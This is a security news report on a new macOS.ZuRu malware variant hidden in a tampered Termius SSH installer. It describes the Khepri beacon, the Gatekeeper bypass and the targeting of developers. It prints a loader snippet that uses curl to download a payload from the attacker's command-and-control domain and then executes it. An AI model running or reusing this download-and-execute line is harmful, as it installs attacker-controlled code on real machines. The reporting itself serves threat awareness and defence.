New ZuRu Malware Variant Weaponizes Termius SSH Client to Attack macOS Users

A fresh strain of the long-running macOS.ZuRu family has surfaced, hiding inside a doctored of the popular Termius SSH client and quietly turning developer workstations into remote footholds.

First seen in late May 2025, the 248 MB rogue disk image looks and behaves like the genuine installer but stealthily inserts a 25 MB Mach-O binary into the Termius Helper bundle.

Once launched, the counterfeit helper runs the legitimate .Termius Helper1 to preserve normal UX while spawning a loader dubbed .localized, which drops a modified Khepri command-and-control beacon under /tmp/.fseventsd and begins polling its operator every five seconds over port 53.

Polyswarm analysts identified the sample’s C2 pattern—ctl01.macnavicat[.]com with the Baidu decoy domain—linking it to earlier ZuRu infrastructure.

Because the implant swaps Termius’s developer signature for an ad-hoc one, Gatekeeper’s trust model is sidestepped, letting the bundle execute without notarization dialogs.

macOS.ZuRu

The campaign specifically targets IT staff and software engineers who favor third-party terminals, underscoring the growing risk posed by pirated or tampered productivity apps.

Beyond data theft, the enhanced beacon can transfer arbitrary files, run shell instructions, and capture output, granting operators persistent, high-fidelity control of compromised Macs.

The remainder of this report drills into the infection mechanism that makes ZuRu’s latest build both elusive and resilient.

The loader’s first task is integrity verification. It computes an MD5 hash of the resident beacon and, if the result diverges from the hard-coded checksum, silently refreshes it from the C2 before chaining execution back to the user’s session.

The logic is compact yet effective:-

EXPECTED_HASH="8ac593fbe69ae93de505003eff446424"
CURRENT_HASH=$(md5 -q /tmp/.fseventsd/Khepri)
[ "$CURRENT_HASH" != "$EXPECTED_HASH" ] && curl -s 
http://ctl01.macnavicat.com/update -o /tmp/.fseventsd/Khepri
chmod +x /tmp/.fseventsd/Khepri && /tmp/.fseventsd/Khepri &

This self-healing step thwarts rudimentary file-based detections by ensuring the payload is always pristine.

Coupled with the five-second heartbeat and background-daemon mode toggle, ZuRu maintains low-latency access even across reboots, highlighting how a single compromised utility can cascade into full-scale network exposure for macOS-centric engineering teams.

Boost detection, reduce alert fatigue, accelerate response; all with an interactive sandbox built for security teams -> Try ANY.RUN Now